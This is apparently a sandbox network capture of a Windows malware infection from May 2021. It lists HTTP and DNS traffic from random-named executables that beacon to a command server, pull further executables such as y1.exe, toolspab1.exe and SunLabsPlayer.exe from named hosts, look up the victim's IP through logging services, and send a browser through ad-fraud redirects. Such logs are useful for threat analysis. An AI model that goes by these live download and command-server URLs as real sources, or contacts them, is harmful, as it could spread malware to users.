gpooe.exe

Remote address:

207.246.80.14:80

Request

GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: uyyge5w3ye.2ihsfa.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:35:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.23
POST

http://uyyge5w3ye.2ihsfa.com/api/?sid=40020&key=654e4bece25b6fb70dc9a00211f8b6f3

gpooe.exe

Remote address:

207.246.80.14:80

Request

POST /api/?sid=40020&key=654e4bece25b6fb70dc9a00211f8b6f3 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uyyge5w3ye.2ihsfa.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:35:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.23
DNS

bbuseruploads.s3.amazonaws.com

powershell.exe

Remote address:

8.8.8.8:53

Request

bbuseruploads.s3.amazonaws.com

IN A

Response

bbuseruploads.s3.amazonaws.com

IN CNAME

s3-1-w.amazonaws.com

s3-1-w.amazonaws.com

IN A

52.216.242.204
GET

https://bbuseruploads.s3.amazonaws.com/3deaabfc-ae97-4c6c-91dd-474d89cc6fb3/downloads/f474c475-65ed-49b0-b11a-ce669aa94772/y1.exe?Signature=fZ3p%2F4uIm2ptKD%2F7I8rASzVLwZI%3D&Expires=1620237756&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=UxyiqDHpL8VKzeVEuRYjNDkhVa15UTRI&response-content-disposition=attachment%3B%20filename%3D%22y1.exe%22

SHyqaefepynae.exe

Remote address:

52.216.242.204:443

Request

GET /3deaabfc-ae97-4c6c-91dd-474d89cc6fb3/downloads/f474c475-65ed-49b0-b11a-ce669aa94772/y1.exe?Signature=fZ3p%2F4uIm2ptKD%2F7I8rASzVLwZI%3D&Expires=1620237756&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=UxyiqDHpL8VKzeVEuRYjNDkhVa15UTRI&response-content-disposition=attachment%3B%20filename%3D%22y1.exe%22 HTTP/1.1
Host: bbuseruploads.s3.amazonaws.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

x-amz-id-2: U5NDj12xNhlmzfZnpGdnz99ud23JAv2nhc6x+ZqvbZr9cMJuusPSLl78RifSiz4oeDYMqGzMP8o=
x-amz-request-id: 23DSSEFJHGYP88FX
Date: Wed, 05 May 2021 17:35:46 GMT
Last-Modified: Fri, 16 Apr 2021 07:00:13 GMT
ETag: "211704d0d7c978042c9fd858fd7a3256"
x-amz-version-id: UxyiqDHpL8VKzeVEuRYjNDkhVa15UTRI
Content-Disposition: attachment; filename="y1.exe"
Accept-Ranges: bytes
Content-Type: application/x-msdownload
Content-Length: 536064
Server: AmazonS3
GET

https://iplogger.org/18hh57

gpooe.exe

Remote address:

88.99.66.31:443

Request

GET /18hh57 HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Host: iplogger.org

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:35:45 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=3jmiclcjh4jgv8j6r41dp7iak0; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=154.61.71.13; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=258812046; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers: 2
whoami: d4acea7b6fcc1911bb9f1914a2537b163a3dff6bb0167ceb12feffc6fbc49471
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
GET

http://ip-api.com/json/?fields=8198

SystemNetworkService

Remote address:

208.95.112.1:80

Request

GET /json/?fields=8198 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: ip-api.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 429 Too Many Requests

Date: Wed, 05 May 2021 17:35:45 GMT
Content-Length: 0
Access-Control-Allow-Origin: *
X-Ttl: 39
X-Rl: 0
GET

http://ip-api.com/json/?fields=8198

SystemNetworkService

Remote address:

208.95.112.1:80

Request

GET /json/?fields=8198 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: ip-api.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 429 Too Many Requests

Date: Wed, 05 May 2021 17:35:45 GMT
Content-Length: 0
Access-Control-Allow-Origin: *
X-Ttl: 39
X-Rl: 0
GET

http://ip-api.com/json/?fields=8198

SystemNetworkService

Remote address:

208.95.112.1:80

Request

GET /json/?fields=8198 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: ip-api.com
Connection: Keep-Alive
Cache-Control: no-cache
GET

http://ip-api.com/json/?fields=8198

SystemNetworkService

Remote address:

208.95.112.1:80

Request

GET /json/?fields=8198 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: ip-api.com
Connection: Keep-Alive
Cache-Control: no-cache
DNS

privacytools.xyz

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

privacytools.xyz

IN A

Response

privacytools.xyz

IN A

45.139.187.152
GET

http://privacytools.xyz/downloads/toolspab1.exe

SHyqaefepynae.exe

Remote address:

45.139.187.152:80

Request

GET /downloads/toolspab1.exe HTTP/1.1
Host: privacytools.xyz
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:35:08 GMT
Content-Type: application/x-msdos-program
Content-Length: 300544
Connection: keep-alive
Keep-Alive: timeout=3
Last-Modified: Wed, 05 May 2021 17:35:01 GMT
ETag: "49600-5c1989d4e9871"
Accept-Ranges: bytes
DNS

1privacytoolsforyou.site

Remote address:

8.8.8.8:53

Request

1privacytoolsforyou.site

IN A

Response
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A
DNS

www.mediaplayerapp.info

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

www.mediaplayerapp.info

IN A

Response

www.mediaplayerapp.info

IN A

89.221.213.3
GET

http://www.mediaplayerapp.info/campaign4/SunLabsPlayer.exe

SHyqaefepynae.exe

Remote address:

89.221.213.3:80

Request

GET /campaign4/SunLabsPlayer.exe HTTP/1.1
Host: www.mediaplayerapp.info
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:35:46 GMT
Server: ATS
Last-Modified: Wed, 05 May 2021 17:07:01 GMT
Accept-Ranges: bytes
Content-Length: 13098514
Cache-Control: max-age=5
Content-Type: application/x-msdownload
Etag: "c7de12-5c1983922d4e4"
Expires: Wed, 05 May 2021 17:35:51 GMT
Age: 4
DNS

uehge4g6gh.2ihsfa.com

huesaa.exe

Remote address:

8.8.8.8:53

Request

uehge4g6gh.2ihsfa.com

IN A

Response

uehge4g6gh.2ihsfa.com

IN A

207.246.80.14
GET

http://uehge4g6gh.2ihsfa.com/api/fbtime

huesaa.exe

Remote address:

207.246.80.14:80

Request

GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:35:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.23
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=40154&key=f4a02cf98c46ee6bd824fcbbb9e52d48

huesaa.exe

Remote address:

207.246.80.14:80

Request

POST /api/?sid=40154&key=f4a02cf98c46ee6bd824fcbbb9e52d48 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 265
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:35:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.23
DNS

tttttt.me

5229.exe

Remote address:

8.8.8.8:53

Request

tttttt.me

IN A

Response

tttttt.me

IN A

95.216.186.40
DNS

venetrigni.com

Remote address:

8.8.8.8:53

Request

venetrigni.com

IN A

Response

venetrigni.com

IN A

54.159.227.166

venetrigni.com

IN A

54.159.127.84

venetrigni.com

IN A

52.72.111.72

venetrigni.com

IN A

54.210.223.232

venetrigni.com

IN A

34.231.55.2

venetrigni.com

IN A

34.194.100.165
GET

https://venetrigni.com/stats

MicrosoftEdgeCP.exe

Remote address:

54.159.227.166:443

Request

GET /stats HTTP/2.0
host: venetrigni.com
accept: */*
origin: https://www.profitabletrustednetwork.com
referer: https://www.profitabletrustednetwork.com/e2q8zu9hu?key=0f22c1fd609f13cb7947c8cabfe1a90d&submetric=14575867
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Wed, 05 May 2021 17:35:59 GMT
content-type: text/html; charset=UTF-8
content-length: 40
server: fasthttp
access-control-allow-origin: https://www.profitabletrustednetwork.com
access-control-allow-credentials: true
set-cookie: uid_id2=3147a70b-c7e1-4d7a-a7ca-b065272de108:1:1; expires=Sat, 03 May 2031 17:35:59 GMT; secure; SameSite=None
GET

https://venetrigni.com/px.gif?akey=28407dccfb372e83ee9d49a69f097187

MicrosoftEdgeCP.exe

Remote address:

54.159.227.166:443

Request

GET /px.gif?akey=28407dccfb372e83ee9d49a69f097187 HTTP/2.0
host: venetrigni.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: uid_id2=3147a70b-c7e1-4d7a-a7ca-b065272de108:1:1

Response

HTTP/2.0 307

date: Wed, 05 May 2021 17:36:01 GMT
content-type: image/gif
content-length: 0
location: http://yourfreecounter.com/dbs?uuid=3147a70b-c7e1-4d7a-a7ca-b065272de108&j=eyJhbGciOiJIUzI1NiJ9.eyJhY2FuIjoxLCJhY3VzIjoxLCJhY2kiOnsgIjE5MjEiOjE2MjAyMzYxNjF9LCJhY2NsIjp7ICIyMCwwIjoxNjIwMjM2MTYxfX0.8ZVYvZdQQXPRVneKNIqIUViIKNAXMLNAt6MngTIZGTs
server: nginx/1.19.5
set-cookie: ak=1921,1620236161; expires=Tue, 03 Aug 2021 17:36:01 GMT; secure; SameSite=None
set-cookie: acl=20,0,1620236161; expires=Tue, 03 Aug 2021 17:36:01 GMT; secure; SameSite=None
expires: Wed, 05 May 2021 17:36:01 GMT
cache-control: max-age=0
cache-control: : no-cache
GET

https://tttttt.me/antitantief3

y1.exe

Remote address:

95.216.186.40:443

Request

GET /antitantief3 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/plain; charset=UTF-8
Host: tttttt.me

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:35:57 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: stel_ssid=ecc6dab85ddae3b690_16843605917849910961; expires=Thu, 06 May 2021 17:35:57 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
Strict-Transport-Security: max-age=35768000
Access-Control-Allow-Origin: *
GET

https://tttttt.me/antitantief3

y1.exe

Remote address:

95.216.186.40:443

Request

GET /antitantief3 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/plain; charset=UTF-8
Host: tttttt.me

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:36:02 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: stel_ssid=dd0ae38eacc9d9e184_12354923464122076398; expires=Thu, 06 May 2021 17:36:02 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
Strict-Transport-Security: max-age=35768000
Access-Control-Allow-Origin: *
GET

https://tttttt.me/antitantief3

y1.exe

Remote address:

95.216.186.40:443

Request

GET /antitantief3 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/plain; charset=UTF-8
Host: tttttt.me

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:36:07 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: stel_ssid=11f590ef15df011a5e_400741917226205837; expires=Thu, 06 May 2021 17:36:07 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
Strict-Transport-Security: max-age=35768000
Access-Control-Allow-Origin: *
GET

https://www.profitabletrustednetwork.com/favicon.ico

MicrosoftEdge.exe

Remote address:

192.243.59.20:443

Request

GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
Host: www.profitabletrustednetwork.com
DNT: 1
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.17.9
Date: Wed, 05 May 2021 17:35:58 GMT
Content-Type: image/x-icon
Content-Length: 0
Connection: keep-alive
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
X-Request-ID: ef96e154b89982f49bad2ad508745959
Strict-Transport-Security: max-age=0; includeSubdomains
GET

https://iplogger.org/18hh57

huesaa.exe

Remote address:

88.99.66.31:443

Request

GET /18hh57 HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Host: iplogger.org

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:35:57 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=9p9acr0o8omtf2i96cl8e9bbj2; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=154.61.71.13; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=258812034; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers: 3
whoami: d4acea7b6fcc1911bb9f1914a2537b163a3dff6bb0167ceb12feffc6fbc49471
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
GET

https://iplogger.org/1TCch7

askinstall39.exe

Remote address:

88.99.66.31:443

Request

GET /1TCch7 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Host: iplogger.org
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:36:11 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=lb8b2va7ok6oji2if3325haai1; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=154.61.71.13; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=258812020; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: 4dc06e46e01f945b2bfd459497806efb5b1d16cb37f57e11cddf0c0a55f54a60
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
GET

https://www.profitabletrustednetwork.com/e2q8zu9hu?shu=7cebdda9faaf2fcce833505798f72e7b35c4cd39374f429b2f03c04f09bac69dae0aa2b8c1cd44bd5e7795fee7df9382876e872131959ce3bb712a411fbb2174ae6f183dce7e4a73427a5df570d8dabe187c9c64&pst=1620236204&rmtc=t&uuid=&pii=&in=false&key=a971bbe4a40a7216a1a87d8f455f71e6

MicrosoftEdgeCP.exe

Remote address:

192.243.59.20:443

Request

GET /e2q8zu9hu?shu=7cebdda9faaf2fcce833505798f72e7b35c4cd39374f429b2f03c04f09bac69dae0aa2b8c1cd44bd5e7795fee7df9382876e872131959ce3bb712a411fbb2174ae6f183dce7e4a73427a5df570d8dabe187c9c64&pst=1620236204&rmtc=t&uuid=&pii=&in=false&key=a971bbe4a40a7216a1a87d8f455f71e6 HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: https://www.profitabletrustednetwork.com/e2q8zu9hu?key=0f22c1fd609f13cb7947c8cabfe1a90d&submetric=14575867
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
Accept-Encoding: gzip, deflate, br
Host: www.profitabletrustednetwork.com
Connection: Keep-Alive
Cookie: u_pl=14575867; cjs=t

Response

HTTP/1.1 302 Found

Server: nginx/1.17.9
Date: Wed, 05 May 2021 17:35:58 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Location: https://click.hooligapps.com/?pid=3&offer_id=12&land=348&ref_id=VjN8MTQ1NzU4Njd8MjMyMjkwOHw2MDM3Njd8MTYyMDIzNjE1OHwwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDB8MTU0LjYxLjcxLjEzfDF8c2g9N2NlYmRkYTlmYWFmMmZjY2U4MzM1MDU3OThmNzJlN2IzNWM0Y2QzOTM3NGY0MjliMmYwM2MwNGYwOWJhYzY5ZGFlMGFhMmI4YzFjZDQ0YmQ1ZTc3OTVmZWU3ZGY5MzgyODc2ZTg3MjEzMTk1OWNlM2JiNzEyYTQxMWZiYjIxNzRhZTZmMTgzZGNlN2U0YTczNDI3YTVkZjU3MGQ4ZGFiZTE4N2M5YzY0fDY1ZjZhYjU4NDY3ZjYzMDgyMGZlMWNlMmUzYjMyMTVl&sub1=pu_main&sub2=14575867
Set-Cookie: iprccc3c052a96a16d95b5ad8c62b6dcfad6=2322908; expires=Wed, 05 May 2021 18:35:58 GMT
Set-Cookie: pdhtkv=true; expires=Thu, 06 May 2021 17:35:58 GMT
Set-Cookie: uncs=1; expires=Thu, 06 May 2021 17:35:58 GMT
Set-Cookie: pdhtkv28=true; expires=Thu, 06 May 2021 17:35:58 GMT
Set-Cookie: uncs28=1; expires=Thu, 06 May 2021 17:35:58 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
X-Request-ID: 142a31b5e60af13c18daee210300c357
Strict-Transport-Security: max-age=0; includeSubdomains
DNS

click.hooligapps.com

Remote address:

8.8.8.8:53

Request

click.hooligapps.com

IN A

Response

click.hooligapps.com

IN A

172.67.172.137

click.hooligapps.com

IN A

104.21.88.44
GET

https://click.hooligapps.com/?pid=3&offer_id=12&land=348&ref_id=VjN8MTQ1NzU4Njd8MjMyMjkwOHw2MDM3Njd8MTYyMDIzNjE1OHwwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDB8MTU0LjYxLjcxLjEzfDF8c2g9N2NlYmRkYTlmYWFmMmZjY2U4MzM1MDU3OThmNzJlN2IzNWM0Y2QzOTM3NGY0MjliMmYwM2MwNGYwOWJhYzY5ZGFlMGFhMmI4YzFjZDQ0YmQ1ZTc3OTVmZWU3ZGY5MzgyODc2ZTg3MjEzMTk1OWNlM2JiNzEyYTQxMWZiYjIxNzRhZTZmMTgzZGNlN2U0YTczNDI3YTVkZjU3MGQ4ZGFiZTE4N2M5YzY0fDY1ZjZhYjU4NDY3ZjYzMDgyMGZlMWNlMmUzYjMyMTVl&sub1=pu_main&sub2=14575867

MicrosoftEdgeCP.exe

Remote address:

172.67.172.137:443

Request

GET /?pid=3&offer_id=12&land=348&ref_id=VjN8MTQ1NzU4Njd8MjMyMjkwOHw2MDM3Njd8MTYyMDIzNjE1OHwwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDB8MTU0LjYxLjcxLjEzfDF8c2g9N2NlYmRkYTlmYWFmMmZjY2U4MzM1MDU3OThmNzJlN2IzNWM0Y2QzOTM3NGY0MjliMmYwM2MwNGYwOWJhYzY5ZGFlMGFhMmI4YzFjZDQ0YmQ1ZTc3OTVmZWU3ZGY5MzgyODc2ZTg3MjEzMTk1OWNlM2JiNzEyYTQxMWZiYjIxNzRhZTZmMTgzZGNlN2U0YTczNDI3YTVkZjU3MGQ4ZGFiZTE4N2M5YzY0fDY1ZjZhYjU4NDY3ZjYzMDgyMGZlMWNlMmUzYjMyMTVl&sub1=pu_main&sub2=14575867 HTTP/2.0
host: click.hooligapps.com
accept: text/html, application/xhtml+xml, image/jxr, */*
referer: https://www.profitabletrustednetwork.com/e2q8zu9hu?key=0f22c1fd609f13cb7947c8cabfe1a90d&submetric=14575867
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 302

date: Wed, 05 May 2021 17:35:58 GMT
content-type: text/html; charset=utf-8
set-cookie: __cfduid=d3e0392d55e8900edb0dc4a936346abf71620236158; expires=Fri, 04-Jun-21 17:35:58 GMT; path=/; domain=.hooligapps.com; HttpOnly; SameSite=Lax
location: https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan
x-clickid: 49400000448b6906
x-frame-options: DENY
vary: Accept-Language, Origin
content-language: en
x-content-type-options: nosniff
referrer-policy: same-origin
set-cookie: haff_cid:3:12=49400000448b6906; expires=Thu, 06 May 2021 17:35:58 GMT; Max-Age=86400; Path=/
cf-cache-status: DYNAMIC
cf-request-id: 09df32ddea00001fbabb000000000001
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=03Mw7x2ngKUsNO%2B4BFsJWNioSEb3cr5EYZ6NTP7suJGOKQAhhrQKq92vVQG9wSX1heOXPc3Sd%2FqcS%2Bc6eOsZWZZWmzgJ0fi3Ahel5OBSW7CJ9t5b7A%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"max_age":604800,"report_to":"cf-nel"}
server: cloudflare
cf-ray: 64abba764d5a1fba-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
DNS

theonlygames.com

Remote address:

8.8.8.8:53

Request

theonlygames.com

IN A

Response

theonlygames.com

IN A

104.21.24.48

theonlygames.com

IN A

172.67.216.212
GET

https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan

MicrosoftEdgeCP.exe

Remote address:

104.21.24.48:443

Request

GET /common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan HTTP/2.0
host: theonlygames.com
accept: text/html, application/xhtml+xml, image/jxr, */*
referer: https://www.profitabletrustednetwork.com/e2q8zu9hu?key=0f22c1fd609f13cb7947c8cabfe1a90d&submetric=14575867
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Wed, 05 May 2021 17:35:59 GMT
content-type: text/html; charset=UTF-8
set-cookie: __cfduid=d68b7f17f71d6bd532b37b5e943f457441620236159; expires=Fri, 04-Jun-21 17:35:59 GMT; path=/; domain=.theonlygames.com; HttpOnly; SameSite=Lax; Secure
cache-control: max-age=14400
cf-cache-status: MISS
cf-request-id: 09df32e0cc00004c5c6d050000000001
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
report-to: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=v3Bc5vzVFdERysd0%2F3ZeRxHbfLHeCWGZyqX1cbcrafFLPv0udTBpgxFGTyAUFjCHDb8FqL9Gny8j6%2FfkUF%2Fe8UyOdu6yOmtA6Hg987110mr%2B"}],"group":"cf-nel"}
nel: {"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 64abba7ad88e4c5c-AMS
content-encoding: br
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET

https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/css/main.css?v=5

MicrosoftEdgeCP.exe

Remote address:

104.21.24.48:443

Request

GET /common/tr/ce/land_ce_110720_2_en/css/main.css?v=5 HTTP/2.0
host: theonlygames.com
accept: text/css, */*
referer: https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan
accept-language: en-US
